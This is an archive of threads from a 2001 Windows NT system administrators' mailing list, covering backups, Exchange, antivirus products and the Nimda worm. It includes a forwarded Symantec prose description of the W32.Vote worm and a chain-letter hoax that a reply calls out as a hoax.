Here's some info, albeit dated: http://www.e-businessworld.com/english/crd_satellite_454142.html I thought Verizon had something too. -Original Message-From: Joe L. Casale [mailto:[EMAIL PROTECTED]]Sent: Wednesday, September 26, 2001 11:20 AMTo: NT System Admin IssuesSubject: RE: satellite connection msn has one, but they make you buy it through radio shack, and right now, only w/ a new Compaq. Jlc Ps. There is a service in NYC as my friend has one, he states it gives about 6mb down! But only 33.6 kb up. -Original Message-From: Matt Moore [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 26, 2001 11:41 AMTo: NT System Admin IssuesSubject: satellite connection anyone have any exp with satellite internet conn. I keep hearing MS has a service but haven't been able to find any info. Matt MooreMCSE, MCP+I, NCSS, HP Want to unsub? Do that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try this one first:http://www.ultratech-llc.com/KB/Want to unsub? Do that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try this one first:http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/
RE: satellite connection
Oops. Not Verizon, I was thinking of Sprint. -Original Message-From: Ray Zorz Sent: Wednesday, September 26, 2001 11:36 AMTo: NT System Admin IssuesSubject: RE: satellite connection Here's some info, albeit dated: http://www.e-businessworld.com/english/crd_satellite_454142.html I thought Verizon had something too. -Original Message-From: Joe L. Casale [mailto:[EMAIL PROTECTED]]Sent: Wednesday, September 26, 2001 11:20 AMTo: NT System Admin IssuesSubject: RE: satellite connection msn has one, but they make you buy it through radio shack, and right now, only w/ a new Compaq. Jlc Ps. There is a service in NYC as my friend has one, he states it gives about 6mb down! But only 33.6 kb up. -Original Message-From: Matt Moore [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 26, 2001 11:41 AMTo: NT System Admin IssuesSubject: satellite connection anyone have any exp with satellite internet conn. I keep hearing MS has a service but haven't been able to find any info. Matt MooreMCSE, MCP+I, NCSS, HP Want to unsub? Do that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try this one first:http://www.ultratech-llc.com/KB/Want to unsub? Do that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try this one first:http://www.ultratech-llc.com/KB/Want to unsub? Do that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try this one first:http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/
RE: Create a Registry File
Title: RE: Create a Registry File http://www.win2000mag.com/Articles/Index.cfm?ArticleID=20047 may help -Original Message- From: Khurram Chaudhary [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 25, 2001 2:07 PM To: NT System Admin Issues Subject: Create a Registry File Does anyone know how to create a registry file that will modify certain keys and values? Khurram Chaudhary Astley-Gilbert Reproductions [EMAIL PROTECTED] Want to unsub? Do that here: http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmin_mode=0=english Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/
RE: Backup Slow
Title: Backup Slow I do, but I have time, and I'm not 24/7. -Original Message-From: Keith Johnson [mailto:[EMAIL PROTECTED]]Sent: Wednesday, September 26, 2001 12:06 PMTo: NT System Admin IssuesSubject: RE: Backup Slow Should we not verify??? -Original Message-From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]Sent: Wednesday, September 26, 2001 12:04 PMTo: NT System Admin IssuesSubject: RE: Backup Slow Read the logs and compare it to an old log. -Original Message-From: William Smith [mailto:[EMAIL PROTECTED]]Sent: Wednesday, September 26, 2001 8:26 AMTo: NT System Admin IssuesSubject: RE: Backup Slow Check under the job-- Advanced tab Make sure "Verify after backup completes" isn't checked. That would definitely double the time. W -Original Message-From: Dominick Romano [mailto:[EMAIL PROTECTED]]Sent: Wednesday, September 26, 2001 11:32 AMTo: NT System Admin IssuesSubject: Backup Slow Hello, we backup our servers with a Dell DLT 7000 7 Slot Tape Drive, using Veritas Backup Exec. Ver. 8. For some strange reason it is taking double the amount of time to backup than it used to. Does anyone have any ideas? Thanks. Dominick Romano Junior NT Administrator Kravet Fabrics, Inc. Tel: 516-293-2000 Ext: 637 Fax: 516-293-2158 mailto:[EMAIL PROTECTED] Want to unsub? Do that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try this one first:http://www.ultratech-llc.com/KB/Want to unsub? Do that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try this one first:http://www.ultratech-llc.com/KB/Want to unsub? Do that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try this one first:http://www.ultratech-llc.com/KB/Want to unsub? Do that here:http://www.w2knews.com/rd/rd.cfm?id=unsubNeed a good FAQ? Try this one first:http://www.ultratech-llc.com/KB/ Want to unsub? Do that here: http://www.w2knews.com/rd/rd.cfm?id=unsub Need a good FAQ? Try this one first: http://www.ultratech-llc.com/KB/
RE: Exchange Store.exe using 95% of CPU
Title: Exchange Store.exe using 95% of CPU A - Try the Sunbelt Exchange list. B - What SP of exchange? C - Are you runningexchange maintenance nightly? Try turning it off tonite. -Original Message-From: Trixie Favato [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 25, 2001 6:54 AMTo: NT System Admin IssuesSubject: Exchange Store.exe using 95% of CPU Has anyone experienced high CPU utilization from the Store.exe when using Exchange 5.5. I've installed the recommended hotfix that Microsoft put out, ran the optimizer again, re-installed SP6a, but nothing seems to help it. Every morning, I am having to reboot the server because the IS stops responding. If anyone has dealt with this before, please share your resolution. Thanks, Trixie Favato Sr. Systems Administrator The Woodbridge Group - Information Technology 4240 Sherwoodtowne Blvd. Mississauga, Ontario Tel. 905.896.3882 Fax. 905-848-1794 Want to unsub? Do that here:http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext_mode=0lang=english Want to unsub? Do that here: http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext_mode=0lang=english
RE: Another F(*^ virus! (OT)
Title: RE: Another F(*^ virus! (OT) I haven't worked with any of the other packages, so I can't compare. It seems to do ok, although they don't have any ALERT system, and always seem to be the last to get a definition out. I still don't know if they have the Vote virus covered. They automatically create a logon script to push the defs to the desktop, so as long as you make sure the server gets updated before everyone logs on it works fine. Our work hours make this a non-issue. Remote users have a problem with the speed. I do know that I gave up on active desktop scanning. It slowed my workstations down too much. I've been lucky that my folks get a lot of e-mail, but aren't big on downloading files. So I'm scanning Exchange and Outlook. Personally, I think way too many of the virii are being caught at the desktop rather than the Exchange server. They also have no filtering/blocking. As soon as I can free up some money I'll most likely dump the Panda for Exchange and get Sybari. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 25, 2001 6:21 AM To: NT System Admin Issues Subject: RE: Another F(*^ virus! (OT) A little off the topic here, but how do you find Panda? We use Norton AV for desktop and server protection, but have Panda for Lotus Notes protection (I think it's a good idea to have a double layer sometimes). Panda was suggested by our Notes Admin guy, and it has not worked correctly since! Currently it is only running on one of our 4 Notes servers, and I don't think it is doing too well there! I'm about ready to dump it, and have put Norton on the other Notes servers to make sure they are covered. Anyone else out there use Panda, and would actually recommend it? G. RZorz@ScottsdaleC hamber.com To: NT System Admin Issues [EMAIL PROTECTED] 25/09/2001 13:51 cc: Please respond to Subject: RE: Another F(*^ virus! NT System Admin Issues Actually one of my users sent that to me. I use Panda, which of course once again seems to be the last to know. -Original Message- From: Danny Iaconetti [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 4:03 PM To: NT System Admin Issues Subject: RE: Another F(*^ virus! According to SARC, updating your definitions will detect this worm. Although, the latest update I get is dated Sep. 20. What's the scoop? -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 4:37 PM To: NT System Admin Issues Subject: Another F(*^ virus! Subject of email: Fwd:Peace BeTweeN AmeriCa and IsLaM! Name of attachment: WTC.exe Size of attachment: 55808 Bytes Symantec Security Response http://securityresponse.symantec.com W32.Vote.A@mm Discovered on: September 24, 2001 Last Updated on: September 24, 2001 at 09:56:27 AM PDT W32.Vote.A@mm is a mass-mailing worm that is written in Visual Basic. When executed, it will email itself out to all email addresses in the Microsoft Outlook address book. The worm will insert two .vbs files on the system, and it will also attempt to delete files from several antivirus products. Type: Worm Infection Length: 55,808 Bytes Virus Definitions: September 24, 2001 Threat Assessment: Wild: Low Damage: High Distribution: High Wild: Number of infections: 0 - 49 Number of sites: 3 - 9 Geographical distribution: Medium Threat containment: Moderate Removal: Moderate Damage: Payload: Large scale e-mailing: Emails everyone in the Microsoft Outlook addressbook Deletes files: After reboot, the worm attempts to delete all files in the Windows folder Modifies files: All files with the extension htm or html will be overwritten. Compromises security settings: If the Backdoor.Trojan was successfully downloaded and installed, anyone could gain full access to the computer. Distribution: Subject of email: Fwd:Peace BeTweeN AmeriCa and IsLaM! Name of attachment: WTC.exe Size of attachment: 55808 Bytes Technical description: W32.Vote.A@mm is a mass-mailing worm written in the Visual Basic language. It requires the file Msvbvm50.dll to execute. When executed, the worm will attempt to email itself to all contacts in the Microsoft Outlook address book. The email will appear as follows. Subject: Fwd:Peace BeTweeN AmeriCa and IsLaM! Message: Hi iS iT A waR Against AmeriCa Or IsLaM !? Let's Vote To Live in Peace! Attachment: WTC.EXE Next, the worm will insert two .vbs files on the system: \Windows folder\ZaCker.vbs \Windows\System folder\MixDaLaL.vbs In addition, the worm will attempt to download and execute a file. This file is detected as Backdoor.Trojan by Norton Antivirus. Finally, the worm will attempt to delete all files from several folders. These folders appear to be the default installation folders for several antivirus products. For Norton AntiVirus, this worm
RE: Another F(*^ virus! (OT)
Title: RE: Another F(*&^ virus! (OT) Again, not a problem here. They all logout, and they all shutdown. If they don't for some reason, it shows up on the Panda Administrator screen, and I log them off myself. Hasn't been that big a problem here, but I've only got 50 users. -Original Message-From: Randal, Phil [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 25, 2001 7:45 AMTo: NT System Admin IssuesSubject: RE: Another F(*^ virus! (OT) Sorry to be pedantic, but a login script is a pull, not a push, and if your users habitually don't log out the login script ain't going to get run in a hurry. Phil -Phil RandalNetwork EngineerHerefordshire CouncilHereford, UK -Original Message-From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]Sent: 25 September 2001 15:01To: NT System Admin IssuesSubject: RE: Another F(*^ virus! (OT) I haven't worked with any of the other packages, so I can't compare. It seems to do ok, although they don't have any "ALERT" system, and always seem to be the last to get a definition out. I still don't know if they have the Vote virus covered. They automatically create a logon script to push the defs to the desktop, so as long as you make sure the server gets updated before everyone logs on it works fine. Our work hours make this a non-issue. Remote users have a problem with the speed. I do know that I gave up on active desktop scanning. It slowed my workstations down too much. I've been lucky that my folks get a lot of e-mail, but aren't big on downloading files. So I'm scanning Exchange and Outlook. Personally, I think way too many of the virii are being caught at the desktop rather than the Exchange server. They also have no filtering/blocking. As soon as I can free up some money I'll most likely dump the Panda for Exchange and get Sybari. Want to unsub? Do that here:http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext_mode=0lang=english Want to unsub? Do that here: http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext_mode=0lang=english
RE: Get Me Off the List, Please
Title: RE: Get Me Off the List, Please tough -Original Message- From: Murray Freeman [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 25, 2001 8:56 AM To: NT System Admin Issues Subject: RE: Get Me Off the List, Please You're correct sir,...but there is much too much noise on this list nonetheless. I can't tell you how many postings I deleted about the WTC disaster that had absolutely nothing to do with NTSYSADMIN. It can be very frustrating but there is good info to be gleaned from this list. I've contributed and I've been helped, but there's still too much noise. Murray -Original Message- From: Dewar Charles R [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 25, 2001 10:46 AM To: NT System Admin Issues Subject: RE: Get Me Off the List, Please Name one. -Original Message- From: Andrew Blevins [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 25, 2001 9:52 AM To: NT System Admin Issues Subject: RE: Get Me Off the List, Please Looks like those of us who want off the list will have to set up an auto-delete rule. This list is so full of noise, its not worth it. There are much more professional, and useful, lists out there. -Original Message- From: Darril Gibson [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 5:28 PM To: NT System Admin Issues Subject: RE: Get Me Off the List, Please Me too. It was advertised as a no noise list. Not so. In just a couple of hours, I have over 100 emails. I tried to get off, but the scripts on the web page don't allow it. Darril R. Gibson ([EMAIL PROTECTED]) Director of Continuing Education MCT, MCSE, MCDBA, MCSD America's Computer Training Source 340-, Cell 328-9299 -Original Message- From: Lucia, Steve [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 5:23 PM To: NT System Admin Issues Subject: RE: Get Me Off the List, Please Just for your info the script is not working!!! I too would like off this list Steve J. Lucia ([EMAIL PROTECTED]) Sr. Network Specialist Client Server Group FFIOC 707-436-2840 co# 227-2840 pager 707-427-9176 -Original Message- From: Don Ely [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 12:32 PM To: NT System Admin Issues Subject: RE: Get Me Off the List, Please Get yourself off the list. The link is at the bottom of the email. -Original Message- From: Maas [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 12:18 PM To: NT System Admin Issues Cc: [EMAIL PROTECTED] Subject: Get Me Off the List, Please [EMAIL PROTECTED] please remove the address above from the list server thank you...in over my head here http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm Want to unsub? Do that here: http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmin_mod e=0lang=english Want to unsub? Do that here: http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmin_mod e=0lang=english Want to unsub? Do that here: http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmin_mode=0=english Want to unsub? Do that here: http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext_mode=0lang=english
RE: Another F(*^ virus! (OT)
Title: RE: Another F(*^ virus! (OT) I finally got it to autoupdate for Exchange. But as I said earlier, I'm still not sure if they have Vote in their defs, their website doesn't get updated quick enough and they don't send alerts. -Original Message- From: Hasan Dervish [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 25, 2001 9:19 AM To: NT System Admin Issues Subject: Re: Another F(*^ virus! (OT) I use panda on BackOffice and BackOffice SBS the only problem I have seen its inability to fully autoupdate in sbs, and autoupdate exchange server in BackOffice. - Original Message - From: Miranda, Fausto [EMAIL PROTECTED] To: NT System Admin Issues [EMAIL PROTECTED] Sent: Tuesday, September 25, 2001 2:57 PM Subject: RE: Another F(*^ virus! (OT) dump it, I have never seen it work correctly. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 25, 2001 9:21 AM To: NT System Admin Issues Subject: RE: Another F(*^ virus! (OT) A little off the topic here, but how do you find Panda? We use Norton AV for desktop and server protection, but have Panda for Lotus Notes protection (I think it's a good idea to have a double layer sometimes). Panda was suggested by our Notes Admin guy, and it has not worked correctly since! Currently it is only running on one of our 4 Notes servers, and I don't think it is doing too well there! I'm about ready to dump it, and have put Norton on the other Notes servers to make sure they are covered. Anyone else out there use Panda, and would actually recommend it? G. RZorz@ScottsdaleC hamber.com To: NT System Admin Issues [EMAIL PROTECTED] 25/09/2001 13:51 cc: Please respond to Subject: RE: Another F(*^ virus! NT System Admin Issues Actually one of my users sent that to me. I use Panda, which of course once again seems to be the last to know. -Original Message- From: Danny Iaconetti [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 4:03 PM To: NT System Admin Issues Subject: RE: Another F(*^ virus! According to SARC, updating your definitions will detect this worm. Although, the latest update I get is dated Sep. 20. What's the scoop? -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 4:37 PM To: NT System Admin Issues Subject: Another F(*^ virus! Subject of email: Fwd:Peace BeTweeN AmeriCa and IsLaM! Name of attachment: WTC.exe Size of attachment: 55808 Bytes Symantec Security Response http://securityresponse.symantec.com W32.Vote.A@mm Discovered on: September 24, 2001 Last Updated on: September 24, 2001 at 09:56:27 AM PDT W32.Vote.A@mm is a mass-mailing worm that is written in Visual Basic. When executed, it will email itself out to all email addresses in the Microsoft Outlook address book. The worm will insert two .vbs files on the system, and it will also attempt to delete files from several antivirus products. Type: Worm Infection Length: 55,808 Bytes Virus Definitions: September 24, 2001 Threat Assessment: Wild: Low Damage: High Distribution: High Wild: Number of infections: 0 - 49 Number of sites: 3 - 9 Geographical distribution: Medium Threat containment: Moderate Removal: Moderate Damage: Payload: Large scale e-mailing: Emails everyone in the Microsoft Outlook addressbook Deletes files: After reboot, the worm attempts to delete all files in the Windows folder Modifies files: All files with the extension htm or html will be overwritten. Compromises security settings: If the Backdoor.Trojan was successfully downloaded and installed, anyone could gain full access to the computer. Distribution: Subject of email: Fwd:Peace BeTweeN AmeriCa and IsLaM! Name of attachment: WTC.exe Size of attachment: 55808 Bytes Technical description: W32.Vote.A@mm is a mass-mailing worm written in the Visual Basic language. It requires the file Msvbvm50.dll to execute. When executed, the worm will attempt to email itself to all contacts in the Microsoft Outlook address book. The email will appear as follows. Subject: Fwd:Peace BeTweeN AmeriCa and IsLaM! Message: Hi iS iT A waR Against AmeriCa Or IsLaM !? Let's Vote To Live in Peace! Attachment: WTC.EXE Next, the worm will insert two .vbs files on the system: \Windows folder\ZaCker.vbs \Windows\System folder\MixDaLaL.vbs In addition, the worm will attempt to download and execute a file. This file is detected as Backdoor.Trojan by Norton Antivirus. Finally, the worm will attempt to delete all files from several folders. These folders appear to be the default installation folders for several antivirus products. For Norton AntiVirus, this worm will only attempt to delete the files if Norton Antivirus is located in C:\Program Files\Norton AntiVirus. What the dropped files do MixDaLaL.vbs MixDaLaL.vbs is a Visual Basic
RE: OT: MS Project 98
http://www.mvps.org/project/faqs.htm - 16. Project Viewer Microsoft has not provided a viewer for Project. However, it is designed with the Web in mind, which allows anyone with an Internet Browser or email facilities to view details. For a picture, try clicking the copy picture button (little camera on the standard toolbar). There you have the option of creating a GIF file which can be used with the Save As... HTML format or directly attached to an email. Save As HTML... give a file name and Save select an Export Map (or New Map) Edit Options tab check "Include image file in HTML page" insert path and name of GIF image. [Project 2000 has Project Central which can display project information including graphical pages.] -Original Message-From: Sawatzke, Jeff [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 25, 2001 11:10 AMTo: NT System Admin IssuesSubject: RE: OT: MS Project 98 They could publish them as HTML files. -Original Message-From: Robert Toland [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 25, 2001 9:15 AMTo: NT System Admin IssuesSubject: Re: OT: MS Project 98No, but if you come across one I'd be interested. "Jolley Lee @Consult" wrote: Dear All, Sorry for the off topic question but I have hit a dead end. Our users are receiving MS Project 98 files from clients but we use a different package for project management. Does anybody know of a viewer for MS project files? Thankyou Lee Jolley ** This email transmission is confidential and intended for the addressee only. It may contain privileged and confidential information. If you are not the person or organisation to whom it is addressed, you must not copy, distribute, or take any action in reliance upon it. If you have received this message in error, please notify the [EMAIL PROTECTED] and return it. Carillion PLC Registered in England No. 3782379 Registered Office: Birch Street Wolverhampton WV1 4HY ** _ This message has been checked for all known viruses by Star Internet delivered through the MessageLabs Virus Scanning Service. For further information visit http://www.star.net.uk/stats.asp or alternatively call Star Internet for details on the Virus Scanning Service. Want to unsub? Do that here: http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext_mode=0lang=englishWant to unsub? Do that here:http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext_mode=0lang=englishWant to unsub? Do that here:http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext_mode=0lang=english Want to unsub? Do that here: http://lyris.sunbelt-software.com/scripts/lyris.pl?enter=ntsysadmintext_mode=0lang=english
RE: Nimda - Thought we were protected
Title: RE: Nimda - Thought we were protected You can't block attachments natively. You need 3rd party antivirus software. -Original Message-From: Kelly Gosh [mailto:[EMAIL PROTECTED]]Sent: Monday, September 24, 2001 11:07 AMTo: NT System Admin IssuesSubject: RE: Nimda - Thought we were protected Where in Exchange 5.5 can you block certain attachments? Ideally, I would like to block all *.exe and all *.vbs from most users. I know how to block domains and email addresses, and I swear I've seen attachment blocking, but for the life of me I can't find it anywhere now! Any help would be appreciated. Kelly Gosh Information Systems Manager Brilliance Audio, Inc. Phone: 616.846.5256 ext. 704 Fax: 616.846.0630 http://www.brillianceaudio.com -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 12:47 PM To: NT System Admin Issues Subject: RE: Nimda - Thought we were protected SCAN ALL FILES (asp,js,htm,html,shtm,shtml,dll), do NOT use program files only! Replace riched20.dll and mcc.exe or you be infected again after you reboot! (ofcourse replace them with clean copys!) Kind regards, Pim Vessies CSO Backoffice Philips Medical Systems IM/CSO/BO Building QAII-441 Veenpluis 4 - 6, 5684 PC Best The Netherlands "Steve Kelsay" [EMAIL PROTECTED] on 09/24/2001 05:11:25 PM Please respond to "NT System Admin Issues" [EMAIL PROTECTED] To: "NT System Admin Issues" [EMAIL PROTECTED] cc: (bcc: Pim Vessies/BST/MS/PHILIPS) Subject: RE: Nimda - Thought we were protected Classification: Yes, I had installed all the patches we discussed here on the site. Steve Kelsay Network Administration Group South Carolina Department of Revenue 301 Gervais Street Columbia, SC 29201 (803) 898-5522 [EMAIL PROTECTED] 09/24/01 10:59AM Did you have the IE patch applied? If the browsed to a infected site they can get the virus that way as well. Robert Muncy Sherman Financial Group -Original Message- From: Steve Kelsay [mailto:[EMAIL PROTECTED]] Sent: Monday, September 24, 2001 10:35 AM To: NT System Admin Issues Subject: Nimda - Thought we were protected First alert, Maybe nothing. We just had our developer machines, running NT2000 Server hit with Nimda. The strange thing is, we have Nimda protection in our email scanner, and all the security fixes MS said should be applied. SP2 is installed. The machines boot up, a log in screen displays, and they login. The Novell login script begins to run as normal ( we run mixed network, NT and Novell), then the login script box clears as normal, a blue screen appears as normal, and nothing further happens. Could this be a new strain? Steve Kelsay Network Administration Group South Carolina Department of Revenue 301 Gervais Street Columbia, SC 29201 (803) 898-5522 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
Another F(*^ virus!
Title: Another F(*^ virus! Subject of email: Fwd:Peace BeTweeN AmeriCa and IsLaM! Name of attachment: WTC.exe Size of attachment: 55808 Bytes Symantec Security Response http://securityresponse.symantec.com W32.Vote.A@mm Discovered on: September 24, 2001 Last Updated on: September 24, 2001 at 09:56:27 AM PDT W32.Vote.A@mm is a mass-mailing worm that is written in Visual Basic. When executed, it will email itself out to all email addresses in the Microsoft Outlook address book. The worm will insert two .vbs files on the system, and it will also attempt to delete files from several antivirus products. Type: Worm Infection Length: 55,808 Bytes Virus Definitions: September 24, 2001 Threat Assessment: Wild: Low Damage: High Distribution: High Wild: Number of infections: 0 - 49 Number of sites: 3 - 9 Geographical distribution: Medium Threat containment: Moderate Removal: Moderate Damage: Payload: Large scale e-mailing: Emails everyone in the Microsoft Outlook addressbook Deletes files: After reboot, the worm attempts to delete all files in the Windows folder Modifies files: All files with the extension htm or html will be overwritten. Compromises security settings: If the Backdoor.Trojan was successfully downloaded and installed, anyone could gain full access to the computer. Distribution: Subject of email: Fwd:Peace BeTweeN AmeriCa and IsLaM! Name of attachment: WTC.exe Size of attachment: 55808 Bytes Technical description: W32.Vote.A@mm is a mass-mailing worm written in the Visual Basic language. It requires the file Msvbvm50.dll to execute. When executed, the worm will attempt to email itself to all contacts in the Microsoft Outlook address book. The email will appear as follows. Subject: Fwd:Peace BeTweeN AmeriCa and IsLaM! Message: Hi iS iT A waR Against AmeriCa Or IsLaM !? Let's Vote To Live in Peace! Attachment: WTC.EXE Next, the worm will insert two .vbs files on the system: \Windows folder\ZaCker.vbs \Windows\System folder\MixDaLaL.vbs In addition, the worm will attempt to download and execute a file. This file is detected as Backdoor.Trojan by Norton Antivirus. Finally, the worm will attempt to delete all files from several folders. These folders appear to be the default installation folders for several antivirus products. For Norton AntiVirus, this worm will only attempt to delete the files if Norton Antivirus is located in C:\Program Files\Norton AntiVirus. What the dropped files do MixDaLaL.vbs MixDaLaL.vbs is a Visual Basic Script file that is inserted in the \Windows\System folder. This file is executed by the worm. As the file is executed, it will look through all folders on all fixed drives and network drives for files with the extensions .htm or .html. If such a files are found, they are overwritten with the message: AmeRiCa ...Few Days WiLL Show You What We Can Do !!! It's Our Turn ZaCkEr is So Sorry For You ZaCker.VBS This file is inserted in the \Windows\System folder. It is not executed by the worm. Instead, the value Norton.Thar \Windows\System\ZaCker.vbs is added to the registry key HKEY_LOCAL_MACHINE\Microsoft\ Windows\CurrentVersion\Run so that the file is executed when you start Windows. When executed at the next restart, this file will attempt to delete all files in the \Windows folder. Next, the worm will create or overwrite the file C:\Autoexec.bat. Inside the file there will be a command that formats the C drive. The Autoexec.bat file is executed on Windows 95/98/Me and DOS systems when you start the computer. Finally, the worm will displays the message The worm does attempt to shut down Windows after the message has been displayed. However, because the files required for this event to occur have been deleted from the \Windows folder, the computer probably will not shut down. Removal instructions: 1. Run LiveUpdate to make sure that you have the most recent virus definitions. 2. Start Norton AntiVirus (NAV), and make sure that NAV is configured to scan all files. For instructions on how to do this, read the document How to configure Norton AntiVirus to scan all files. 3. Run a full system scan. 4. Delete all files that are detected as W32.Vote.A@mm. If the worm has run and Norton AntiVirus is installed in C:\Program Files\Norton AntiVirus, you should reinstall Norton Antivirus. 5. If the computer has been rebooted after the infection, or if the computer seems very unstable, it is recommended that you reinstall the operating system. Additional information: If the Backdoor.Trojan was successfully installed on the computer, it is possible that your system has been accessed remotely by an unauthorized user. For this reason it is impossible to guarantee the integrity of a system that has had such an infection. The remote user could have made changes to your system, including but not limited to the following: Stealing or changing passwords or password files
RE: How do you all do it?
Title: RE: How do you all do it? This list didn't help me with Nimda as much as it did with ILOVEYOU. Fellow listers from all over the world started crashing, and I was able to handle it here with a brilliant low-tech solution - I printed a big warning out and put it on everyone's desktop. With only 50 users that was feasible, and because I'm in at least 2 hours earlier than anyone else. But this list saved the day! -Original Message- From: Martin Blackstone [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 20, 2001 3:29 PM To: NT System Admin Issues Subject: RE: How do you all do it? I was going to say that. There are some MAJOR advantages to being on these lists. As an example, many of us knew about Nimda hours before anyone else did. Granted we didn't have technical details or a name, but we knew there was something bad happening and to start battening down the hatches. You cant put a price on info like that. I guarantee you, you sub to these lists, your knowledge will grow exponentially, and you will look like a hero to your boss when you know the S*T is about to hit the fan well before anyone else does. -Original Message- From: Diane Beckham [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 20, 2001 3:26 PM To: NT System Admin Issues Subject: RE: How do you all do it? Hey, this IS work. Knowing about a virus BEFORE users tell us, is major work Diane -Original Message- From: Don Collier (Intermap Denver) [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 20, 2001 3:03 PM To: NT System Admin Issues Subject: How do you all do it? I just joined this list today and am overwhelmed with email. Almost 200 messages today. How do you all keep up with this list and get any work done? (Not meant to imply anything) _ Don Collier Network Administrator Intermap Technologies Inc. Voice: 303-708-0955 x-207 Fax: 303-708-0952 [EMAIL PROTECTED] www.intermaptechnologies.com http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: WORST EVER VIRUS (CNN announced)
Title: RE: WORST EVER VIRUS (CNN announced) Hoax. see www.sophos.com. Of course, if I was going to create a virus, first thing I'd do is name it after one of the hoaxes. -Original Message- From: Sabrina Stolcz [mailto:[EMAIL PROTECTED]] Sent: Thursday, September 20, 2001 1:18 PM To: NT System Admin Issues Subject: WORST EVER VIRUS (CNN announced) WORST EVER VIRUS (CNN announced) PLEASE SEND THIS TO EVERYONE ON YOUR CONTACT LIST!! A new virus has just been discovered that has been classified by Microsoft as the most destructive ever! This virus was discovered yesterday afternoon by McAfee and no vaccine has yet been developed. This virus simply destroys Sector Zero from the hard disk, where vital information for its Functioning are stored. This virus acts in the following manner: It sends itself automatically to all contacts on your list with the title A Virtual Card for You. As soon as the supposed virtual card is opened, the computer freezes so that the user has to reboot. When the ctrl+alt+del keys or the reset button are pressed, the virus destroys Sector Zero,thus permanently destroying the hard disk. Yesterday in just a few hours this virus caused panic in New York, according to news broadcast by CNN. This alert was received by an employee of Microsoft itself. So don't open any mails with subject: A Virtual Card for You. As soon as you get the mail, delete it. This email with all information contained herein or attached hereto may contain confidential and/or privileged information intended for the addressee(s) only. If you have received this email in error, please contact the sender and immediately delete this email in its entirety and any attachments thereto.. http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Microsoft Has Nimda
